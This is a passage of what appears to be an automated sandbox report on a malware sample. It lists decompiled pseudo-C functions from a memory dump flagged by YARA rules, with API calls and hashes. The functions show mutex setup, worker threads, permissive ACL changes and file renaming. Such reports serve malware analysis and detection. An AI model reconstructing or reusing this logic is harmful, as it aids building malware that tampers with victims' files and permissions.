                                    • GetLastError.KERNEL32 ref: 0008A48B
                                    • GetLastError.KERNEL32 ref: 0008A495
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$CreateMutex
                                    • String ID:
                                    • API String ID: 200418032-0
                                    • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                                    • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
                                    • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                                    • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E00086DA0(void* __eflags, void* __fp0) {
                                    				short _v536;
                                    				WCHAR* _v544;
                                    				WCHAR* _t9;
                                    				intOrPtr _t10;
                                    				intOrPtr _t11;
                                    				void* _t22;
                                    				void* _t32;
                                    				intOrPtr _t34;
                                    				intOrPtr _t35;
                                    				intOrPtr _t41;
                                    				intOrPtr _t43;
                                    				intOrPtr _t46;
                                    				intOrPtr _t49;
                                    				void* _t51;
                                    				void* _t53;
                                    				void* _t56;
                                    				WCHAR* _t59;
                                    				signed int _t60;
                                    				void* _t62;
                                    				void* _t63;
                                    				void* _t74;
                                    
                                    				_t74 = __fp0;
                                    				_t34 =  *0x9e778; // 0x12afc08
                                    				_t62 = (_t60 & 0xfffffff8) - 0x21c;
                                    				_t51 = 0x31;
                                    				_t32 = 1; // executed
                                    				_t9 = E00089ED0(_t34, _t51); // executed
                                    				if(_t9 != 0) {
                                    					_t10 =  *0x9e78c; // 0x0
                                    					_t66 = _t10;
                                    					if(_t10 == 0) {
                                    						_t49 =  *0x9e688; // 0xf0000
                                    						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
                                    						 *0x9e78c = _t10;
                                    					}
                                    					_push(0);
                                    					_push(_t10);
                                    					_t11 =  *0x9e688; // 0xf0000
                                    					_push(L"\\c");
                                    					_t9 = E000892E5(_t11 + 0x438);
                                    					_t59 = _t9;
                                    					_t63 = _t62 + 0x10;
                                    					_v544 = _t59;
                                    					if(_t59 != 0) {
                                    						while(1) {
                                    							_t35 =  *0x9e688; // 0xf0000
                                    							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
                                    							if(_t56 == 0) {
                                    								break;
                                    							}
                                    							if(E0008B269(_t59) == 0) {
                                    								_t32 = E0008F14F(_t59, 0x1388, _t74);
                                    							}
                                    							E0008A4DB(_t56);
                                    							_t41 =  *0x9e684; // 0x12af8f0
                                    							 *((intOrPtr*)(_t41 + 0x30))(_t56);
                                    							if(_t32 > 0) {
                                    								E0008980C( &_v544);
                                    								_t43 =  *0x9e778; // 0x12afc08
                                    								_t53 = 0x33;
                                    								if(E00089ED0(_t43, _t53) != 0) {
                                    									L12:
                                    									__eflags = E00081C68(_t59, __eflags, _t74);
                                    									if(__eflags >= 0) {
                                    										E0008B1B1(_t59, _t53, __eflags, _t74);
                                    										continue;
                                    									}
                                    								} else {
                                    									_t46 =  *0x9e778; // 0x12afc08
                                    									_t53 = 0x12;
                                    									_t22 = E00089ED0(_t46, _t53);
                                    									_t72 = _t22;
                                    									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
                                    										_push(E0008980C(0));
                                    										E00089640( &_v536, 0x104, L"%s.%u", _t59);
                                    										_t63 = _t63 + 0x14;
                                    										MoveFileW(_t59,  &_v536);
                                    										continue;
                                    									} else {
                                    										goto L12;
                                    									}
                                    								}
                                    							}
                                    							break;
                                    						}
                                    						_t9 = E0008861A( &_v544, 0xfffffffe);
                                    					}
                                    				}
                                    				return _t9;
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileMove
                                    • String ID: %s.%u
                                    • API String ID: 3562171763-1288070821
                                    • Opcode ID: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
                                    • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
                                    • Opcode Fuzzy Hash: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
                                    • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E00082AEA() {
                                    				intOrPtr _v8;
                                    				signed int _v12;
                                    				CHAR* _v16;
                                    				signed int _t16;
                                    				intOrPtr _t21;
                                    				intOrPtr _t22;
                                    				void* _t26;
                                    				void* _t29;
                                    				signed int _t31;
                                    				intOrPtr _t36;
                                    				CHAR* _t38;
                                    				intOrPtr _t39;
                                    				void* _t40;
                                    
                                    				_t15 =  *0x9e710 * 0x64;
                                    				_t39 = 0;
                                    				_v12 =  *0x9e710 * 0x64;
                                    				_t16 = E00088604(_t15);
                                    				_t38 = _t16;
                                    				_v16 = _t38;
                                    				if(_t38 != 0) {
                                    					_t31 =  *0x9e710; // 0x2
                                    					_t36 = 0;
                                    					_v8 = 0;
                                    					if(_t31 == 0) {
                                    						L9:
                                    						_push(_t38);
                                    						E00089F48(0xe); // executed
                                    						E0008861A( &_v16, _t39);
                                    						return 0;
                                    					}
                                    					_t29 = 0;
                                    					do {
                                    						_t21 =  *0x9e714; // 0x12aff28
                                    						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
                                    							if(_t39 != 0) {
                                    								lstrcatA(_t38, "|");
                                    								_t39 = _t39 + 1;
                                    							}
                                    							_t22 =  *0x9e714; // 0x12aff28
                                    							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
                                    							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
                                    							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
                                    							_t31 =  *0x9e710; // 0x2
                                    							_t40 = _t40 + 0x18;
                                    							_t36 = _v8;
                                    							_t39 = _t39 + _t26;
                                    						}
                                    						_t36 = _t36 + 1;
                                    						_t29 = _t29 + 0x20;
                                    						_v8 = _t36;
                                    					} while (_t36 < _t31);
                                    					goto L9;
                                    				}
                                    				return _t16 | 0xffffffff;
                                    			}

                                    APIs
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeaplstrcat
                                    • String ID: %u;%u;%u
                                    • API String ID: 3011335133-2973439046
                                    • Opcode ID: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
                                    • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
                                    • Opcode Fuzzy Hash: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
                                    • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 59%
                                    			E0008BD10() {
                                    				char _v8;
                                    				void* _v12;
                                    				char _v16;
                                    				short _v20;
                                    				char _v24;
                                    				short _v28;
                                    				char _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				void _v96;
                                    				intOrPtr _t58;
                                    				intOrPtr _t61;
                                    				intOrPtr _t63;
                                    				intOrPtr _t65;
                                    				intOrPtr _t67;
                                    				intOrPtr _t70;
                                    				intOrPtr _t73;
                                    				intOrPtr _t77;
                                    				intOrPtr _t79;
                                    				intOrPtr _t81;
                                    				intOrPtr _t85;
                                    				intOrPtr _t87;
                                    				signed int _t90;
                                    				void* _t92;
                                    				intOrPtr _t93;
                                    				void* _t98;
                                    
                                    				_t90 = 8;
                                    				_v28 = 0xf00;
                                    				_v32 = 0;
                                    				_v24 = 0;
                                    				memset( &_v96, 0, _t90 << 2);
                                    				_v20 = 0x100;
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_v16 = 0;
                                    				_push(0);
                                    				_v8 = 0;
                                    				_push(1);
                                    				_v12 = 0;
                                    				_push( &_v24);
                                    				_t58 =  *0x9e68c; // 0x12afab8
                                    				_t98 = 0;
                                    				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
                                    					L14:
                                    					if(_v8 != 0) {
                                    						_t67 =  *0x9e68c; // 0x12afab8
                                    						 *((intOrPtr*)(_t67 + 0x10))(_v8);
                                    					}
                                    					if(_v12 != 0) {
                                    						_t65 =  *0x9e68c; // 0x12afab8
                                    						 *((intOrPtr*)(_t65 + 0x10))(_v12);
                                    					}
                                    					if(_t98 != 0) {
                                    						_t63 =  *0x9e684; // 0x12af8f0
                                    						 *((intOrPtr*)(_t63 + 0x34))(_t98);
                                    					}
                                    					if(_v16 != 0) {
                                    						_t61 =  *0x9e684; // 0x12af8f0
                                    						 *((intOrPtr*)(_t61 + 0x34))(_v16);
                                    					}
                                    					L22:
                                    					return _t98;
                                    				}
                                    				_v68 = _v12;
                                    				_t70 =  *0x9e688; // 0xf0000
                                    				_t92 = 2;
                                    				_v96 = 0x1fffff;
                                    				_v92 = 0;
                                    				_v88 = 3;
                                    				_v76 = 0;
                                    				_v72 = 5;
                                    				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
                                    					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
                                    						goto L7;
                                    					}
                                    					goto L4;
                                    				} else {
                                    					L4:
                                    					_push( &_v8);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(1);
                                    					_push(_t92);
                                    					_push(_t92);
                                    					_push( &_v32);
                                    					_t85 =  *0x9e68c; // 0x12afab8
                                    					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
                                    						goto L14;
                                    					} else {
                                    						_t87 = _v8;
                                    						if(_t87 != 0) {
                                    							_push(2);
                                    							_pop(1);
                                    							_v64 = 0x1fffff;
                                    							_v60 = 1;
                                    							_v56 = 3;
                                    							_v44 = 0;
                                    							_v40 = 1;
                                    							_v36 = _t87;
                                    						}
                                    						L7:
                                    						_push( &_v16);
                                    						_push(0);
                                    						_push( &_v96);
                                    						_t73 =  *0x9e68c; // 0x12afab8
                                    						_push(1); // executed
                                    						if( *((intOrPtr*)(_t73 + 8))() != 0) {
                                    							goto L14;
                                    						}
                                    						_t98 = LocalAlloc(0x40, 0x14);
                                    						if(_t98 == 0) {
                                    							goto L14;
                                    						}
                                    						_t93 =  *0x9e68c; // 0x12afab8
                                    						_push(1);
                                    						_push(_t98);
                                    						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
                                    							goto L14;
                                    						}
                                    						_t77 =  *0x9e68c; // 0x12afab8
                                    						_push(0);
                                    						_push(_v16);
                                    						_push(1);
                                    						_push(_t98);
                                    						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
                                    							goto L14;
                                    						}
                                    						if(_v8 != 0) {
                                    							_t81 =  *0x9e68c; // 0x12afab8
                                    							 *((intOrPtr*)(_t81 + 0x10))(_v8);
                                    						}
                                    						_t79 =  *0x9e68c; // 0x12afab8
                                    						 *((intOrPtr*)(_t79 + 0x10))(_v12);
                                    						goto L22;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
                                    • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocEntriesLocal
                                    • String ID:
                                    • API String ID: 2146116654-0
                                    • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                                    • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
                                    • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                                    • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _t45;
                                    				intOrPtr _t46;
                                    				intOrPtr _t48;
                                    				intOrPtr _t49;
                                    				void* _t52;
                                    				intOrPtr _t53;
                                    				intOrPtr _t54;
                                    				struct _SECURITY_ATTRIBUTES* _t58;
                                    				intOrPtr _t59;
                                    				intOrPtr _t61;
                                    				intOrPtr _t65;
                                    				intOrPtr _t66;
                                    				intOrPtr _t67;
                                    				intOrPtr _t69;
                                    				struct _SECURITY_ATTRIBUTES* _t73;
                                    				intOrPtr _t74;
                                    				intOrPtr _t77;
                                    				intOrPtr _t78;
                                    				intOrPtr _t79;
                                    				intOrPtr _t82;
                                    				intOrPtr _t83;
                                    				void* _t86;
                                    				intOrPtr _t87;
                                    				intOrPtr _t89;
                                    				signed int _t92;
                                    				intOrPtr _t97;
                                    				intOrPtr _t98;
                                    				int _t106;
                                    				intOrPtr _t110;
                                    				signed int _t112;
                                    				signed int _t113;
                                    				void* _t115;
                                    
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_v8 = __edx;
                                    				_v12 = __ecx;
                                    				_t77 =  *0x9e76c; // 0x1dc
                                    				_t73 = 0;
                                    				if(E0008A4BF(_t77, 0x7530) >= 0) {
                                    					_t45 =  *0x9e770; // 0x1400b50
                                    					_t112 = 0;
                                    					_t106 = 0;
                                    					do {
                                    						_t78 =  *((intOrPtr*)(_t106 + _t45));
                                    						if(_t78 == 0) {
                                    							L6:
                                    							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
                                    								_t113 = _t112 << 5;
                                    								if(_v8 == _t73) {
                                    									 *(_t113 + _t45 + 0x10) = _t73;
                                    									_t46 =  *0x9e770; // 0x1400b50
                                    									 *(_t113 + _t46 + 0xc) = _t73;
                                    									L14:
                                    									_t79 =  *0x9e770; // 0x1400b50
                                    									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
                                    									_t48 =  *0x9e770; // 0x1400b50
                                    									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
                                    									_t49 = E0008A471(0, 1);
                                    									_t82 =  *0x9e770; // 0x1400b50
                                    									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
                                    									_t83 =  *0x9e770; // 0x1400b50
                                    									_t30 = _t83 + _t113 + 4; // 0x1400b54
                                    									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
                                    									_t53 =  *0x9e770; // 0x1400b50
                                    									 *(_t113 + _t53) = _t52;
                                    									_t54 =  *0x9e770; // 0x1400b50
                                    									_t86 =  *(_t113 + _t54);
                                    									if(_t86 != 0) {
                                    										SetThreadPriority(_t86, 0xffffffff);
                                    										_t87 =  *0x9e770; // 0x1400b50
                                    										 *0x9e774 =  *0x9e774 + 1;
                                    										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
                                    										_t74 =  *0x9e770; // 0x1400b50
                                    										_t73 = _t74 + _t113;
                                    									} else {
                                    										_t59 =  *0x9e684; // 0x12af8f0
                                    										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
                                    										_t61 =  *0x9e770; // 0x1400b50
                                    										_t37 = _t61 + 0xc; // 0x1400b5c
                                    										_t91 = _t37 + _t113;
                                    										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
                                    											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
                                    											_t61 =  *0x9e770; // 0x1400b50
                                    										}
                                    										_t92 = 8;
                                    										memset(_t113 + _t61, 0, _t92 << 2);
                                    									}
                                    									L19:
                                    									_t89 =  *0x9e76c; // 0x1dc
                                    									E0008A4DB(_t89);
                                    									_t58 = _t73;
                                    									L20:
                                    									return _t58;
                                    								}
                                    								_t110 = _a4;
                                    								_t65 = E00088604(_t110);
                                    								_t97 =  *0x9e770; // 0x1400b50
                                    								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
                                    								_t66 =  *0x9e770; // 0x1400b50
                                    								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
                                    									goto L19;
                                    								}
                                    								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
                                    								_t67 =  *0x9e770; // 0x1400b50
                                    								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
                                    								_t115 = _t115 + 0xc;
                                    								goto L14;
                                    							}
                                    							goto L7;
                                    						}
                                    						_t69 =  *0x9e684; // 0x12af8f0
                                    						_push(_t73);
                                    						_push(_t78);
                                    						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
                                    							_t45 =  *0x9e770; // 0x1400b50
                                    							goto L7;
                                    						}
                                    						_t98 =  *0x9e770; // 0x1400b50
                                    						E0008984A(_t106 + _t98, 0);
                                    						_t45 =  *0x9e770; // 0x1400b50
                                    						goto L6;
                                    						L7:
                                    						_t106 = _t106 + 0x20;
                                    						_t112 = _t112 + 1;
                                    					} while (_t106 < 0x1000);
                                    					goto L19;
                                    				}
                                    				_t58 = 0;
                                    				goto L20;
                                    			}

                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E00085631(void* __edx, void* __edi) {
                                    				char _v44;
                                    				void* _t8;
                                    				intOrPtr _t11;
                                    				intOrPtr _t14;
                                    				intOrPtr _t17;
                                    				intOrPtr _t18;
                                    				void* _t20;
                                    				void* _t33;
                                    				void* _t34;
                                    				void* _t36;
                                    				void* _t39;
                                    				void* _t40;
                                    				intOrPtr _t49;
                                    				void* _t54;
                                    
                                    				_t54 = __edi;
                                    				_t8 = E00089E66(0x3b); // executed
                                    				if(_t8 != 0xffffffff) {
                                    					L2:
                                    					E0008980C(0x9e6c8);
                                    					_t39 = 0x37; // executed
                                    					E00089F06(_t39);
                                    					_t11 =  *0x9e688; // 0xf0000
                                    					_t40 = 0x3a; // executed
                                    					E00089F06(_t40); // executed
                                    					E0008E4C1(_t63);
                                    					_t14 =  *0x9e688; // 0xf0000
                                    					_t41 =  &_v44;
                                    					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
                                    					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
                                    					_t17 =  *0x9e684; // 0x12af8f0
                                    					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
                                    					 *0x9e74c = _t18;
                                    					if(_t18 != 0) {
                                    						_t20 = CreateMutexA(0, 0, 0);
                                    						 *0x9e76c = _t20;
                                    						__eflags = _t20;
                                    						if(_t20 != 0) {
                                    							_t34 = E00088604(0x1000);
                                    							_t52 = 0;
                                    							 *0x9e770 = _t34;
                                    							_t49 =  *0x9e774; // 0x2
                                    							__eflags = _t34;
                                    							_t41 =  !=  ? 0 : _t49;
                                    							 *0x9e774 =  !=  ? 0 : _t49; // executed
                                    						}
                                    						E0008153B(_t41, _t52); // executed
                                    						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
                                    						E00083017(); // executed
                                    						E000831C2(0, __eflags); // executed
                                    						E000829B1(); // executed
                                    						E00083BB2(_t54, __eflags); // executed
                                    						while(1) {
                                    							__eflags =  *0x9e758; // 0x0
                                    							if(__eflags != 0) {
                                    								break;
                                    							}
                                    							E0008980C(0x9e750);
                                    							_push(0x9e750);
                                    							_push(0x9e750); // executed
                                    							E0008279B();
                                    							Sleep(0xfa0);
                                    						}
                                    						E00083D34();
                                    						E00089A8E();
                                    						E000834CB();
                                    						_t33 = 0;
                                    						__eflags = 0;
                                    					} else {
                                    						goto L3;
                                    					}
                                    				} else {
                                    					_t36 = E00082DCB();
                                    					_t63 = _t36;
                                    					if(_t36 != 0) {
                                    						L3:
                                    						_t33 = 1;
                                    					} else {
                                    						goto L2;
                                    					}
                                    				}
                                    				return _t33;
                                    			}

                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
                                      • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                                      • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                                    • Sleep.KERNELBASE(00000FA0), ref: 0008574A
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                    • API String ID: 3249252070-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 27%
                                    			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				intOrPtr _t26;
                                    				intOrPtr _t27;
                                    				intOrPtr _t29;
                                    				intOrPtr _t34;
                                    				intOrPtr* _t39;
                                    				void* _t47;
                                    				intOrPtr _t55;
                                    				intOrPtr _t58;
                                    				char _t60;
                                    
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t50 = _a4;
                                    				_t60 = 0;
                                    				_v12 = 0;
                                    				if(_a4 != 0) {
                                    					_t47 = E0008A63B(_t50);
                                    					if(_t47 == 0) {
                                    						L11:
                                    						_t26 = 0;
                                    						L12:
                                    						L13:
                                    						return _t26;
                                    					}
                                    					_t27 =  *0x9e684; // 0x12af8f0
                                    					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
                                    					if(_t58 == 0) {
                                    						L9:
                                    						_t29 =  *0x9e684; // 0x12af8f0
                                    						 *((intOrPtr*)(_t29 + 0x30))(_t47);
                                    						if(_t60 != 0) {
                                    							E0008861A( &_v12, 0);
                                    						}
                                    						goto L11;
                                    					}
                                    					_t4 = _t58 + 1; // 0x1
                                    					_t34 = E00088604(_t4); // executed
                                    					_t60 = _t34;
                                    					_v12 = _t60;
                                    					if(_t60 == 0) {
                                    						goto L9;
                                    					}
                                    					_a4 = _a4 & 0;
                                    					_push(0);
                                    					_v8 = 0;
                                    					_push( &_a4);
                                    					_push(_t58);
                                    					_push(_t60);
                                    					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
                                    						if(_a4 == 0) {
                                    							if(_v8 != _t58) {
                                    								goto L9;
                                    							}
                                    							_t39 = _a8;
                                    							 *((char*)(_t58 + _t60)) = 0;
                                    							if(_t39 != 0) {
                                    								 *_t39 = _t58;
                                    							}
                                    							CloseHandle(_t47);
                                    							_t26 = _t60;
                                    							goto L12;
                                    						}
                                    						_t55 = _v8 + _a4;
                                    						_a4 = _a4 & 0x00000000;
                                    						_push(0);
                                    						_push( &_a4);
                                    						_v8 = _t55;
                                    						_push(_t58 - _t55);
                                    						_push(_t55 + _t60);
                                    					}
                                    					goto L9;
                                    				}
                                    				_t26 = 0;
                                    				goto L13;
                                    			}

                                    APIs
                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000EEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                                    • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000EEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,012AFD20,00000400), ref: 0008A776
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    • API ID: CloseFileHandleRead
                                    • API String ID: 2331702139-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E0008153B(void* __ecx, void* __edx) {
                                    				void* _v8;
                                    				void* _t3;
                                    				signed int _t4;
                                    				intOrPtr _t7;
                                    				signed int _t9;
                                    				intOrPtr _t10;
                                    				void* _t24;
                                    
                                    				_push(__ecx);
                                    				_t3 = CreateMutexA(0, 0, 0);
                                    				 *0x9e6f4 = _t3;
                                    				if(_t3 == 0) {
                                    					L11:
                                    					_t4 = _t3 | 0xffffffff;
                                    					__eflags = _t4;
                                    				} else {
                                    					_t3 = CreateMutexA(0, 0, 0);
                                    					 *0x9e6dc = _t3;
                                    					if(_t3 == 0) {
                                    						goto L11;
                                    					} else {
                                    						_t3 = E00081080(0x4ac);
                                    						_v8 = _t3;
                                    						if(_t3 == 0) {
                                    							goto L11;
                                    						} else {
                                    							 *0x9e6e8 = E000891A6(_t3, 0);
                                    							E000885C2( &_v8);
                                    							_t7 = E00088604(0x100);
                                    							 *0x9e6f0 = _t7;
                                    							if(_t7 != 0) {
                                    								 *0x9e6fc = 0;
                                    								_t9 = E00088604(0x401);
                                    								 *0x9e6d4 = _t9;
                                    								__eflags = _t9;
                                    								if(_t9 != 0) {
                                    									__eflags =  *0x9e6c0; // 0x0
                                    									if(__eflags == 0) {
                                    										E000915B6(0x88202, 0x8820b);
                                    									}
                                    									_push(0x61e);
                                    									_t24 = 8;
                                    									_t10 = E0008E1BC(0x9bd28, _t24); // executed
                                    									 *0x9e6a0 = _t10;
                                    									_t4 = 0;
                                    								} else {
                                    									_push(0xfffffffc);
                                    									goto L5;
                                    								}
                                    							} else {
                                    								_push(0xfffffffe);
                                    								L5:
                                    								_pop(_t4);
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _t4;
                                    			}











                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
                                      • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex$AllocateHeap
                                    • String ID:
                                    • API String ID: 704353917-0
                                    • Opcode ID: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                                    • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
                                    • Opcode Fuzzy Hash: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                                    • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E0008BC7A(void* __ecx, void* __edx) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _t18;
                                    				intOrPtr _t19;
                                    				intOrPtr _t27;
                                    				intOrPtr _t30;
                                    				intOrPtr _t36;
                                    				intOrPtr _t38;
                                    				char _t39;
                                    
                                    				_t39 = 0;
                                    				_t38 =  *0x9e674; // 0x1f8
                                    				_v8 = 0;
                                    				_v12 = 0;
                                    				_v20 = 0;
                                    				_v16 = 0;
                                    				_t18 = E000895E1(__ecx, 0x84b);
                                    				_push(0);
                                    				_v24 = _t18;
                                    				_push( &_v8);
                                    				_push(1);
                                    				_push(_t18);
                                    				_t19 =  *0x9e68c; // 0x12afab8, executed
                                    				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
                                    					_push( &_v16);
                                    					_push( &_v12);
                                    					_push( &_v20);
                                    					_t27 =  *0x9e68c; // 0x12afab8
                                    					_push(_v8);
                                    					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
                                    						_push(_v12);
                                    						_t30 =  *0x9e68c; // 0x12afab8
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0x10);
                                    						_push(6);
                                    						_push(_t38); // executed
                                    						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
                                    							_t39 = 1;
                                    						}
                                    					}
                                    					_t36 =  *0x9e68c; // 0x12afab8
